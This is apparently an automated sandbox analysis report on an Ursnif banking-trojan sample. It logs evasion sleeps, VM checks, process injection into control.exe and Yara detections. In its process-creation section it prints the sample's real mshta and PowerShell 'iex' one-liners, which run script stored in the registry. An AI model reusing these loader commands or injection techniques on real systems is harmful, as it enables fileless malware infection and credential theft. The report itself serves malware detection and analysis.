Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4674
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1463

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5044	Thread sleep time: -1667865539s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604	Thread sleep count: 1463 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_0462FD33

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: mshta.exe, 00000023.00000003.856754934.0000025397C3B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}J
Source: mshta.exe, 00000031.00000003.892638496.0000023B71221000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 0000002D.00000003.880596197.000002732AA5F000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04637EA1 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

3_2_04637EA1

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\control.exe

Thread created: unknown EIP: BD4F1580

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 5512			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF694A512E0			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.936200566.0000000002250000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.937464403.0000000003A40000.00000002.00000001.sdmp, powershell.exe, 0000002F.00000002.936379966.00000251AA760000.00000002.00000001.sdmp, control.exe, 00000032.00000000.914635032.00000200948F0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04622239 cpuid

3_2_04622239

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046217C3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

3_2_046217C3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001456 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_10001456

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

3_2_0464104F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_10001F0E

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
